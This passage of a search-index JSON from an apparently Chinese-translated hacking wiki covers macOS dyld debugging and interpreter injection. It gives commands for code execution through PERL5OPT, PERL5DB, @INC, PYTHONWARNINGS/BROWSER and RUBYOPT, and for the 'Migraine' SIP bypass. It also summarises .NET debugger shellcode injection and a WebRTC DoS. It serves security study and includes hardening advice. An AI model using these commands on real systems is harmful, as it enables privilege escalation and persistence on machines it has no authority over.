\\"WARP_IS_LOCAL_SHELL_SESSION=1\\"\\n0x16fdffdb9: \\"SDKROOT=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX14.4.sdk\\"\\n0x16fdffe24: \\"NVM_DIR=/Users/carlospolop/.nvm\\"\\n0x16fdffe44: \\"CONDA_CHANGEPS1=false\\"\\n0x16fdffe5a: \\"\\"\\n0x16fdffe5b: \\"\\"\\n0x16fdffe5c: \\"\\"\\n0x16fdffe5d: \\"\\"\\n0x16fdffe5e: \\"\\"\\n0x16fdffe5f: \\"\\"\\n0x16fdffe60: \\"pfz=0xffeaf0000\\"\\n0x16fdffe70: \\"stack_guard=0x8af2b510e6b800b5\\"\\n0x16fdffe8f: \\"malloc_entropy=0xf2349fbdea53f1e4,0x3fd85d7dcf817101\\"\\n0x16fdffec4: \\"ptr_munge=0x983e2eebd2f3e746\\"\\n0x16fdffee1: \\"main_stack=0x16fe00000,0x7fc000,0x16be00000,0x4000000\\"\\n0x16fdfff17: \\"executable_file=0x1a01000012,0x5105b6a\\"\\n0x16fdfff3e: \\"dyld_file=0x1a01000012,0xfffffff0009834a\\"\\n0x16fdfff67: \\"executable_cdhash=757a1b08ab1a79c50a66610f3adbca86dfd3199b\\"\\n0x16fdfffa2: \\"executable_boothash=f32448504e788a2c5935e372d22b7b18372aa5aa\\"\\n0x16fdfffdf: \\"arm64e_abi=os\\"\\n0x16fdfffed: \\"th_port=0x103\\"\\n0x16fdffffb: \\"\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » apple[] 参数向量","id":"2516","title":"apple[] 参数向量"},"2517":{"body":"这是由 dyld 导出的一个结构,包含有关 dyld 状态的信息,可以在 源代码 中找到,包含版本、指向 dyld_image_info 数组的指针、指向 dyld_image_notifier 的指针、如果进程与共享缓存分离、如果调用了 libSystem 初始化程序、指向 dyls 自身 Mach 头的指针、指向 dyld 版本字符串的指针等信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » dyld_all_image_infos","id":"2517","title":"dyld_all_image_infos"},"2518":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » dyld 环境变量","id":"2518","title":"dyld 环境变量"},"2519":{"body":"有趣的环境变量有助于理解 dyld 在做什么: DYLD_PRINT_LIBRARIES 检查每个加载的库: DYLD_PRINT_LIBRARIES=1 ./apple\\ndyld[19948]: <9F848759-9AB8-3BD2-96A1-C069DC1FFD43> /private/tmp/a\\ndyld[19948]: /usr/lib/libSystem.B.dylib\\ndyld[19948]: /usr/lib/system/libcache.dylib\\ndyld[19948]: /usr/lib/system/libcommonCrypto.dylib\\ndyld[19948]: /usr/lib/system/libcompiler_rt.dylib\\ndyld[19948]: <65612C42-C5E4-3821-B71D-DDE620FB014C> /usr/lib/system/libcopyfile.dylib\\ndyld[19948]: /usr/lib/system/libcorecrypto.dylib\\ndyld[19948]: <8790BA20-19EC-3A36-8975-E34382D9747C> /usr/lib/system/libdispatch.dylib\\ndyld[19948]: <4BB77515-DBA8-3EDF-9AF7-3C9EAE959EA6> /usr/lib/system/libdyld.dylib\\ndyld[19948]: /usr/lib/system/libkeymgr.dylib\\ndyld[19948]: <1A7038EC-EE49-35AE-8A3C-C311083795FB> /usr/lib/system/libmacho.dylib\\n[...] DYLD_PRINT_SEGMENTS 检查每个库是如何加载的: DYLD_PRINT_SEGMENTS=1 ./apple\\ndyld[21147]: re-using existing shared cache (/System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e):\\ndyld[21147]: 0x181944000->0x1D5D4BFFF init=5, max=5 __TEXT\\ndyld[21147]: 0x1D5D4C000->0x1D5EC3FFF init=1, max=3 __DATA_CONST\\ndyld[21147]: 0x1D7EC4000->0x1D8E23FFF init=3, max=3 __DATA\\ndyld[21147]: 0x1D8E24000->0x1DCEBFFFF init=3, max=3 __AUTH\\ndyld[21147]: 0x1DCEC0000->0x1E22BFFFF init=1, max=3 __AUTH_CONST\\ndyld[21147]: 0x1E42C0000->0x1E5457FFF init=1, max=1 __LINKEDIT\\ndyld[21147]: 0x1E5458000->0x22D173FFF init=5, max=5 __TEXT\\ndyld[21147]: 0x22D174000->0x22D9E3FFF init=1, max=3 __DATA_CONST\\ndyld[21147]: 0x22F9E4000->0x230F87FFF init=3, max=3 __DATA\\ndyld[21147]: 0x230F88000->0x234EC3FFF init=3, max=3 __AUTH\\ndyld[21147]: 0x234EC4000->0x237573FFF init=1, max=3 __AUTH_CONST\\ndyld[21147]: 0x239574000->0x270BE3FFF init=1, max=1 __LINKEDIT\\ndyld[21147]: Kernel mapped /private/tmp/a\\ndyld[21147]: __PAGEZERO (...) 0x000000904000->0x000101208000\\ndyld[21147]: __TEXT (r.x) 0x000100904000->0x000100908000\\ndyld[21147]: __DATA_CONST (rw.) 0x000100908000->0x00010090C000\\ndyld[21147]: __LINKEDIT (r..) 0x00010090C000->0x000100910000\\ndyld[21147]: Using mapping in dyld cache for /usr/lib/libSystem.B.dylib\\ndyld[21147]: __TEXT (r.x) 0x00018E59D000->0x00018E59F000\\ndyld[21147]: __DATA_CONST (rw.) 0x0001D5DFDB98->0x0001D5DFDBA8\\ndyld[21147]: __AUTH_CONST (rw.) 0x0001DDE015A8->0x0001DDE01878\\ndyld[21147]: __AUTH (rw.) 0x0001D9688650->0x0001D9688658\\ndyld[21147]: __DATA (rw.) 0x0001D808AD60->0x0001D808AD68\\ndyld[21147]: __LINKEDIT (r..) 0x000239574000->0x000270BE4000\\ndyld[21147]: Using mapping in dyld cache for /usr/lib/system/libcache.dylib\\ndyld[21147]: __TEXT (r.x) 0x00018E597000->0x00018E59D000\\ndyld[21147]: __DATA_CONST (rw.) 0x0001D5DFDAF0->0x0001D5DFDB98\\ndyld[21147]: __AUTH_CONST (rw.) 0x0001DDE014D0->0x0001DDE015A8\\ndyld[21147]: __LINKEDIT (r..) 0x000239574000->0x000270BE4000\\n[...] DYLD_PRINT_INITIALIZERS 当每个库初始化器运行时打印: DYLD_PRINT_INITIALIZERS=1 ./apple\\ndyld[21623]: running initializer 0x18e59e5c0 in /usr/lib/libSystem.B.dylib\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 调试 dyld","id":"2519","title":"调试 dyld"},"252":{"body":"UDP端口分配: 当用户发起WebRTC通话时,媒体服务器为处理媒体流分配UDP端口,IP和端口通过信令进行通信。 ICE和STUN过程: 用户的浏览器使用ICE进行媒体同意验证,利用STUN确定到媒体服务器的连接路径。 DTLS会话: 在成功的STUN验证后,DTLS会话开始建立SRTP主密钥,切换到SRTP进行媒体流传输。","breadcrumbs":"Pentesting Network » WebRTC DoS » 漏洞来源","id":"252","title":"漏洞来源"},"2520":{"body":"DYLD_BIND_AT_LAUNCH: 懒惰绑定与非懒惰绑定一起解析 DYLD_DISABLE_PREFETCH: 禁用 __DATA 和 __LINKEDIT 内容的预取 DYLD_FORCE_FLAT_NAMESPACE: 单级绑定 DYLD_[FRAMEWORK/LIBRARY]_PATH | DYLD_FALLBACK_[FRAMEWORK/LIBRARY]_PATH | DYLD_VERSIONED_[FRAMEWORK/LIBRARY]_PATH: 解析路径 DYLD_INSERT_LIBRARIES: 加载特定库 DYLD_PRINT_TO_FILE: 将 dyld 调试写入文件 DYLD_PRINT_APIS: 打印 libdyld API 调用 DYLD_PRINT_APIS_APP: 打印主程序调用的 libdyld API DYLD_PRINT_BINDINGS: 打印绑定时的符号 DYLD_WEAK_BINDINGS: 仅在绑定时打印弱符号 DYLD_PRINT_CODE_SIGNATURES: 打印代码签名注册操作 DYLD_PRINT_DOFS: 打印加载的 D-Trace 对象格式部分 DYLD_PRINT_ENV: 打印 dyld 看到的环境 DYLD_PRINT_INTERPOSTING: 打印插入操作 DYLD_PRINT_LIBRARIES: 打印加载的库 DYLD_PRINT_OPTS: 打印加载选项 DYLD_REBASING: 打印符号重基操作 DYLD_RPATHS: 打印 @rpath 的扩展 DYLD_PRINT_SEGMENTS: 打印 Mach-O 段的映射 DYLD_PRINT_STATISTICS: 打印时间统计 DYLD_PRINT_STATISTICS_DETAILS: 打印详细时间统计 DYLD_PRINT_WARNINGS: 打印警告信息 DYLD_SHARED_CACHE_DIR: 用于共享库缓存的路径 DYLD_SHARED_REGION: \\"use\\", \\"private\\", \\"avoid\\" DYLD_USE_CLOSURES: 启用闭包 可以通过类似的方式找到更多内容: bash strings /usr/lib/dyld | grep \\"^DYLD_\\" | sort -u 或从 https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz 下载 dyld 项目并在文件夹内运行: bash find . -type f | xargs grep strcmp| grep key,\\\\ \\\\\\" | cut -d\'\\"\' -f2 | sort -u","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 其他","id":"2520","title":"其他"},"2521":{"body":"*OS Internals, Volume I: User Mode. By Jonathan Levin tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 参考","id":"2521","title":"参考"},"2522":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » macOS Perl Applications Injection","id":"2522","title":"macOS Perl Applications Injection"},"2523":{"body":"使用环境变量 PERL5OPT ,可以在解释器启动时(甚至在解析目标脚本的第一行之前)使 Perl 执行任意命令。 例如,创建这个脚本: test.pl #!/usr/bin/perl\\nprint \\"Hello from the Perl script!\\\\n\\"; 现在 导出环境变量 并执行 perl 脚本: bash export PERL5OPT=\'-Mwarnings;system(\\"whoami\\")\'\\nperl test.pl # This will execute \\"whoami\\" 另一个选项是创建一个 Perl 模块(例如 /tmp/pmod.pm): /tmp/pmod.pm #!/usr/bin/perl\\npackage pmod;\\nsystem(\'whoami\');\\n1; # Modules must return a true value 然后使用环境变量,以便模块能够自动定位和加载: bash PERL5LIB=/tmp/ PERL5OPT=-Mpmod perl victim.pl","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 通过 PERL5OPT 和 PERL5LIB 环境变量","id":"2523","title":"通过 PERL5OPT 和 PERL5LIB 环境变量"},"2524":{"body":"PERL5DB – 当解释器以 -d (调试器)标志启动时,PERL5DB 的内容会作为 Perl 代码在调试器上下文中执行。如果你可以影响特权 Perl 进程的环境 和 命令行标志,你可以做如下操作: bash export PERL5DB=\'system(\\"/bin/zsh\\")\'\\nsudo perl -d /usr/bin/some_admin_script.pl # 在执行脚本之前会打开一个 shell PERL5SHELL – 在 Windows 上,此变量控制 Perl 在需要生成 shell 时将使用哪个 shell 可执行文件。这里提到它只是为了完整性,因为在 macOS 上它并不相关。 尽管 PERL5DB 需要 -d 开关,但常见的维护或安装脚本以 root 身份执行时会启用此标志以进行详细故障排除,使该变量成为有效的提升向量。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 其他有趣的环境变量","id":"2524","title":"其他有趣的环境变量"},"2525":{"body":"可以通过运行以下命令列出 Perl 将搜索的包含路径 ( @INC ): bash perl -e \'print join(\\"\\\\n\\", @INC)\' 在 macOS 13/14 上的典型输出如下: bash /Library/Perl/5.30/darwin-thread-multi-2level\\n/Library/Perl/5.30\\n/Network/Library/Perl/5.30/darwin-thread-multi-2level\\n/Network/Library/Perl/5.30\\n/Library/Perl/Updates/5.30.3\\n/System/Library/Perl/5.30/darwin-thread-multi-2level\\n/System/Library/Perl/5.30\\n/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level\\n/System/Library/Perl/Extras/5.30 一些返回的文件夹甚至不存在,然而 /Library/Perl/5.30 确实存在, 不 受 SIP 保护,并且在 SIP 保护的文件夹之前。因此,如果你可以以 root 身份写入,你可以放置一个恶意模块(例如 File/Basename.pm),该模块将被任何导入该模块的特权脚本 优先 加载。 warning 你仍然需要 root 权限才能写入 /Library/Perl,macOS 会显示一个 TCC 提示,要求为执行写入操作的进程提供 完全磁盘访问 权限。 例如,如果一个脚本导入 use File::Basename; ,则可以创建 /Library/Perl/5.30/File/Basename.pm,其中包含攻击者控制的代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 通过依赖项(@INC 滥用)","id":"2525","title":"通过依赖项(@INC 滥用)"},"2526":{"body":"在 2023 年 5 月,微软披露了 CVE-2023-32369 ,昵称为 Migraine ,这是一种后期利用技术,允许 root 攻击者完全 绕过系统完整性保护 (SIP) 。 易受攻击的组件是 systemmigrationd ,这是一个具有 com.apple.rootless.install.heritable 权限的守护进程。该守护进程生成的任何子进程都继承该权限,因此在 SIP 限制之外运行。 研究人员识别出的子进程中包括 Apple 签名的解释器: /usr/bin/perl /usr/libexec/migrateLocalKDC … 因为 Perl 尊重 PERL5OPT(而 Bash 尊重 BASH_ENV),污染守护进程的 环境 足以在没有 SIP 的上下文中获得任意执行: bash # As root\\nlaunchctl setenv PERL5OPT \'-Mwarnings;system(\\"/private/tmp/migraine.sh\\")\' # Trigger a migration (or just wait – systemmigrationd will eventually spawn perl)\\nopen -a \\"Migration Assistant.app\\" # or programmatically invoke /System/Library/PrivateFrameworks/SystemMigration.framework/Resources/MigrationUtility 当 migrateLocalKDC 运行时,/usr/bin/perl 会在恶意的 PERL5OPT 下启动,并在 SIP 被重新启用之前执行 /private/tmp/migraine.sh。通过该脚本,你可以,例如,将有效负载复制到 /System/Library/LaunchDaemons 中,或分配 com.apple.rootless 扩展属性以使文件 不可删除 。 苹果在 macOS Ventura 13.4 、 Monterey 12.6.6 和 Big Sur 11.7.7 中修复了该问题,但较旧或未修补的系统仍然可以被利用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 通过迁移助手绕过 SIP (CVE-2023-32369 “Migraine”)","id":"2526","title":"通过迁移助手绕过 SIP (CVE-2023-32369 “Migraine”)"},"2527":{"body":"清除危险变量 – 特权的 launchdaemons 或 cron 作业应在干净的环境中启动(launchctl unsetenv PERL5OPT,env -i 等)。 避免以 root 身份运行解释器 ,除非绝对必要。使用编译的二进制文件或尽早降低权限。 使用 -T(污点模式)对供应商脚本进行处理 ,以便 Perl 在启用污点检查时忽略 PERL5OPT 和其他不安全的开关。 保持 macOS 更新 – “Migraine” 在当前版本中已完全修补。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 加固建议","id":"2527","title":"加固建议"},"2528":{"body":"Microsoft Security Blog – “新的 macOS 漏洞 Migraine 可能绕过系统完整性保护”(CVE-2023-32369),2023年5月30日。 Hackyboiz – “macOS SIP 绕过(PERL5OPT 和 BASH_ENV)研究”,2025年5月。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 参考文献","id":"2528","title":"参考文献"},"2529":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Python Applications Injection » macOS Python 应用程序注入","id":"2529","title":"macOS Python 应用程序注入"},"253":{"body":"竞争条件利用: 攻击者可以通过在合法用户之前发送DTLS ClientHello消息来利用竞争条件,可能使用无效的密码套件如TLS_NULL_WITH_NULL_NULL。这会导致服务器出现DTLS错误,阻止SRTP会话的建立。","breadcrumbs":"Pentesting Network » WebRTC DoS » 利用机制","id":"253","title":"利用机制"},"2530":{"body":"可以更改这两个环境变量,以便在每次调用 python 时执行任意代码,例如: bash # Generate example python script\\necho \\"print(\'hi\')\\" > /tmp/script.py # RCE which will generate file /tmp/hacktricks\\nPYTHONWARNINGS=\\"all:0:antigravity.x:0:0\\" BROWSER=\\"/bin/sh -c \'touch /tmp/hacktricks\' #%s\\" python3 /tmp/script.py # RCE which will generate file /tmp/hacktricks bypassing \\"-I\\" injecting \\"-W\\" before the script to execute\\nBROWSER=\\"/bin/sh -c \'touch /tmp/hacktricks\' #%s\\" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Python Applications Injection » 通过 PYTHONWARNINGS 和 BROWSER 环境变量","id":"2530","title":"通过 PYTHONWARNINGS 和 BROWSER 环境变量"},"2531":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Ruby Applications Injection » macOS Ruby Applications Injection","id":"2531","title":"macOS Ruby Applications Injection"},"2532":{"body":"使用这个环境变量,可以在每次执行 ruby 时 添加新参数 。虽然参数**-e 不能用于指定要执行的ruby代码,但可以使用参数 -I 和 -r 来添加一个新文件夹到库加载路径,然后 指定要加载的库**。 在**/tmp 中创建库 inject.rb**: inject.rb puts `whoami` 创建一个类似于以下的 Ruby 脚本: hello.rb puts \'Hello, World!\' 然后使用以下任意 Ruby 脚本加载它: bash RUBYOPT=\\"-I/tmp -rinject\\" ruby hello.rb 有趣的事实,即使使用参数 --disable-rubyopt 也有效: bash RUBYOPT=\\"-I/tmp -rinject\\" ruby hello.rb --disable-rubyopt tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Ruby Applications Injection » RUBYOPT","id":"2532","title":"RUBYOPT"},"2533":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 这是帖子 https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/ 的摘要。请查看以获取更多详细信息!","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » macOS .Net 应用程序注入","id":"2533","title":"macOS .Net 应用程序注入"},"2534":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » .NET Core 调试","id":"2534","title":".NET Core 调试"},"2535":{"body":"在 .NET 中,调试器与被调试程序之间的通信处理由 dbgtransportsession.cpp 管理。该组件为每个 .NET 进程设置两个命名管道,如 dbgtransportsession.cpp#L127 所示,这些管道通过 twowaypipe.cpp#L27 初始化。这些管道的后缀为 -in 和 -out 。 通过访问用户的 $TMPDIR ,可以找到可用于调试 .Net 应用程序的调试 FIFO。 DbgTransportSession::TransportWorker 负责管理来自调试器的通信。要启动新的调试会话,调试器必须通过 out 管道发送一条以 MessageHeader 结构开头的消息,该结构在 .NET 源代码中详细说明: c struct MessageHeader {\\nMessageType m_eType; // Message type\\nDWORD m_cbDataBlock; // Size of following data block (can be zero)\\nDWORD m_dwId; // Message ID from sender\\nDWORD m_dwReplyId; // Reply-to Message ID\\nDWORD m_dwLastSeenId; // Last seen Message ID by sender\\nDWORD m_dwReserved; // Reserved for future (initialize to zero)\\nunion {\\nstruct {\\nDWORD m_dwMajorVersion; // Requested/accepted protocol version\\nDWORD m_dwMinorVersion;\\n} VersionInfo;\\n...\\n} TypeSpecificData;\\nBYTE m_sMustBeZero[8];\\n} 要请求一个新会话,结构体如下填充,将消息类型设置为 MT_SessionRequest,并将协议版本设置为当前版本: c static const DWORD kCurrentMajorVersion = 2;\\nstatic const DWORD kCurrentMinorVersion = 0; // Configure the message type and version\\nsSendHeader.m_eType = MT_SessionRequest;\\nsSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion;\\nsSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion;\\nsSendHeader.m_cbDataBlock = sizeof(SessionRequestData); 该标题随后通过 write 系统调用发送到目标,后面是包含会话 GUID 的 sessionRequestData 结构: c write(wr, &sSendHeader, sizeof(MessageHeader));\\nmemset(&sDataBlock.m_sSessionID, 9, sizeof(SessionRequestData));\\nwrite(wr, &sDataBlock, sizeof(SessionRequestData)); 对out管道的读取操作确认调试会话建立的成功或失败: c read(rd, &sReceiveHeader, sizeof(MessageHeader));","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » 建立调试会话","id":"2535","title":"建立调试会话"},"2536":{"body":"一旦建立了调试会话,就可以使用 MT_ReadMemory 消息类型读取内存。函数 readMemory 进行了详细说明,执行发送读取请求和检索响应所需的步骤: c bool readMemory(void *addr, int len, unsigned char **output) {\\n// Allocation and initialization\\n...\\n// Write header and read response\\n...\\n// Read the memory from the debuggee\\n...\\nreturn true;\\n} 完整的概念验证(POC)可在 这里 获取。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » 读取内存","id":"2536","title":"读取内存"},"2537":{"body":"类似地,可以使用 writeMemory 函数写入内存。该过程涉及将消息类型设置为 MT_WriteMemory,指定数据的地址和长度,然后发送数据: c bool writeMemory(void *addr, int len, unsigned char *input) {\\n// Increment IDs, set message type, and specify memory location\\n...\\n// Write header and data, then read the response\\n...\\n// Confirm memory write was successful\\n...\\nreturn true;\\n} 相关的POC可以在 这里 找到。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » 写入内存","id":"2537","title":"写入内存"},"2538":{"body":"要执行代码,需要识别一个具有rwx权限的内存区域,这可以通过使用vmmap -pages:来完成。 bash vmmap -pages [pid]\\nvmmap -pages 35829 | grep \\"rwx/rwx\\" 定位一个覆盖函数指针的位置是必要的,在 .NET Core 中,可以通过针对 Dynamic Function Table (DFT) 来实现。这个表在 jithelpers.h 中详细描述,是运行时用于 JIT 编译辅助函数的。 对于 x64 系统,可以使用签名搜索来找到 libcorclr.dll 中符号 _hlpDynamicFuncTable 的引用。 MT_GetDCB 调试器函数提供了有用的信息,包括一个辅助函数的地址 m_helperRemoteStartAddr,指示 libcorclr.dll 在进程内存中的位置。然后使用这个地址开始搜索 DFT,并用 shellcode 的地址覆盖一个函数指针。 注入 PowerShell 的完整 POC 代码可以在 这里 访问。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » .NET Core代码执行","id":"2538","title":".NET Core代码执行"},"2539":{"body":"https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » References","id":"2539","title":"References"},"254":{"body":"端口扫描: 攻击者需要猜测哪些UDP端口正在处理传入的媒体会话,向这些端口发送带有空密码套件的ClientHello消息以触发漏洞。 攻击示意图: 该序列涉及攻击者向服务器发送多个ClientHello消息,夹杂着合法的信令和DTLS消息,导致由于错误的密码套件而握手失败。","breadcrumbs":"Pentesting Network » WebRTC DoS » 攻击过程","id":"254","title":"攻击过程"},"2540":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS 安全保护","id":"2540","title":"macOS 安全保护"},"2541":{"body":"Gatekeeper 通常用于指代 Quarantine + Gatekeeper + XProtect 的组合,这三个 macOS 安全模块将尝试 防止用户执行潜在恶意软件 。 更多信息请参见: macOS Gatekeeper / Quarantine / XProtect","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » Gatekeeper","id":"2541","title":"Gatekeeper"},"2542":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 进程限制","id":"2542","title":"进程限制"},"2543":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » MACF","id":"2543","title":"MACF"},"2544":{"body":"macOS SIP","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » SIP - 系统完整性保护","id":"2544","title":"SIP - 系统完整性保护"},"2545":{"body":"MacOS 沙盒 限制应用程序 在沙盒内运行时的 允许操作,这些操作在沙盒配置文件中指定 。这有助于确保 应用程序仅访问预期的资源 。 macOS Sandbox","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 沙盒","id":"2545","title":"沙盒"},"2546":{"body":"TCC (透明性、同意和控制) 是一个安全框架。它旨在 管理应用程序的权限 ,特别是通过调节它们对敏感功能的访问。这包括 位置服务、联系人、照片、麦克风、相机、辅助功能和完整磁盘访问 等元素。TCC 确保应用程序只能在获得用户明确同意后访问这些功能,从而增强对个人数据的隐私和控制。 macOS TCC","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » TCC - 透明性、同意和控制","id":"2546","title":"TCC - 透明性、同意和控制"},"2547":{"body":"macOS 中的启动约束是一种安全特性,用于 调节进程启动 ,通过定义 谁可以启动 进程、 如何 启动以及 从哪里 启动。该功能在 macOS Ventura 中引入,将系统二进制文件分类到信任缓存中的约束类别。每个可执行二进制文件都有设定的 启动规则 ,包括 自我 、 父级 和 责任 约束。扩展到第三方应用程序作为 macOS Sonoma 中的 环境 约束,这些功能通过管理进程启动条件来帮助减轻潜在的系统利用。 macOS Launch/Environment Constraints & Trust Cache","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 启动/环境约束与信任缓存","id":"2547","title":"启动/环境约束与信任缓存"},"2548":{"body":"恶意软件移除工具 (MRT) 是 macOS 安全基础设施的另一个组成部分。顾名思义,MRT 的主要功能是 从感染的系统中移除已知恶意软件 。 一旦在 Mac 